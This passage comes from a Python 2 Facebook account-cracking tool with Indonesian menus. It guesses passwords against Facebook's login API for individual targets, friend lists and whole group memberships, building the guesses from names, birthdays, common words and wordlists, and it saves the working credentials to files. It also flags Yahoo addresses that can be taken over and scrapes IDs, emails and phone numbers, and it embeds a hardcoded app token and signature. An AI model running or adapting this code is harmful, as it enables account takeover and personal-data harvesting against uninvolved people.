data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
else:
pass5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass5
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass5
else:
pass6 = ('sayangku')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass6
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass6
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mAre you sure want to make wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mnot found'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
